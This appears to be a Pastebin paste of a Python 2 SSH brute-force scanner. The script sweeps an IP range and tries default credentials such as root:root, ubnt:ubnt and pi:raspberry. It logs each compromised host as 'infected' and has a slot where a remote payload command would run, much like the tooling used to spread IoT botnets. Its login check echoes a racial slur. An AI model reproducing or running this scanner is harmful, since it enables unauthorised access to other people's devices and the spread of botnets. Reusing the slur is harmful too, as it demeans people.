Advertisement
Guest User

Untitled

a guest
May 22nd, 2016
150
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.15 KB | None | 0 0
  1. #!/usr/bin/env python
  2.  
  3. import threading, paramiko, random, socket, time, os, sys
  4.  
  5. os.system("clear")
  6. if len(sys.argv) < 3:
  7. print "SUPPER SSH SCANNER"
  8. print "Usage: python "+sys.argv[0]+" [Start IP] [End IP] [0/1/2/perl/ubnt]"
  9. sys.exit("Example: python "+sys.argv[0]+" 1.1.1.1 2.2.2.2 0\n")
  10.  
  11. sys.stdout.write("\x1b]2;BuSyBoX BaNG BuS\x07")
  12. paramiko.util.log_to_file("/dev/null") #quiets paramiko output
  13.  
  14. passwords = [ # argv 0
  15. "ubnt:ubnt",
  16. "root:root",
  17. "root:admin",
  18. "admin:admin",
  19. "root:1234",
  20. "admin:1234",
  21. "guest:guest",
  22. "user:user",
  23. "test:test",
  24. ]
  25.  
  26. if sys.argv[3] == '1':
  27. passwords = [ "root:root", "root:admin", "admin:admin", "ubnt:ubnt", "root:1234", "admin:1234", "guest:guest", "user:user", "test:test" ] #Slow but effective
  28. if sys.argv[3] == '2':
  29. passwords = [ "root:root", "admin:admin", "ubnt:ubnt" ] #faster with decent execution
  30. if sys.argv[3] == 'perl':
  31. passwords = [ "pi:raspberry", "vagrant:vagrant" ] #perl scanner
  32. if sys.argv[3] == 'ubnt':
  33. passwords = [ "ubnt:ubnt" ] #only ubnt
  34.  
  35. raw_input("Press <ENTER> to Enter the Bang Bus")
  36. credit = '# DO NOT SHARE THIS FUCKING SHIT' #throwback lulz
  37. print "\033[0m" + credit + "\033[0m"
  38.  
  39. def ipRange(start_ip, end_ip):
  40. start = list(map(int, start_ip.split(".")))
  41. end = list(map(int, end_ip.split(".")))
  42. temp = start
  43. ip_range = []
  44.  
  45. ip_range.append(start_ip)
  46. while temp != end:
  47. start[3] += 1
  48. for i in (3, 2, 1):
  49. if temp[i] == 256:
  50. temp[i] = 0
  51. temp[i-1] += 1
  52. ip_range.append(".".join(map(str, temp)))
  53.  
  54. return ip_range
  55. class sshscanner(threading.Thread): # TAG: 1A
  56. def __init__ (self, ip):
  57. threading.Thread.__init__(self)
  58. self.ip = str(ip)
  59. global passwords
  60. def run(self):
  61. x = 1
  62. while x != 0:
  63. try:
  64. username='root'
  65. password="0"
  66. port = 22
  67. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  68. s.settimeout(3)
  69. s.connect((self.ip, port))
  70. s.close()
  71. ssh = paramiko.SSHClient()
  72. ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
  73. dobreak=False
  74. for passwd in passwords:
  75. if ":n/a" in passwd:
  76. password=""
  77. else:
  78. password=passwd.split(":")[1]
  79. if "n/a:" in passwd:
  80. username=""
  81. else:
  82. username=passwd.split(":")[0]
  83. try:
  84. ssh.connect(self.ip, port = port, username=username, password=password, timeout=5)
  85. dobreak=True
  86. break
  87. except:
  88. pass
  89. if True == dobreak:
  90. break
  91. badserver=True
  92. stdin, stdout, stderr = ssh.exec_command("echo nigger")
  93. output = stdout.read()
  94. if "nigger" in output:
  95. badserver=False
  96. if badserver == False:
  97. os.system("echo -e " +self.ip+ " >> .infected.ips")
  98. os.system("echo -e " +username+ ":" +password+ ":" +self.ip+ " >> infection.log")
  99. print "\033[32mBuSyBoXiNG -> " +username+ ":" +password+ ":" +self.ip+ "\033[0m"
  100. ssh.exec_command("command here")
  101. time.sleep(3)
  102. ssh.close()
  103. if badserver == True:
  104. ssh.close()
  105. except:
  106. pass
  107. x = 0
  108. ip_range = ipRange("" +sys.argv[1], "" +sys.argv[2])
  109. for ip in ip_range:
  110. try:
  111. t = sshscanner(ip)
  112. t.start()
  113. except:
  114. pass
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement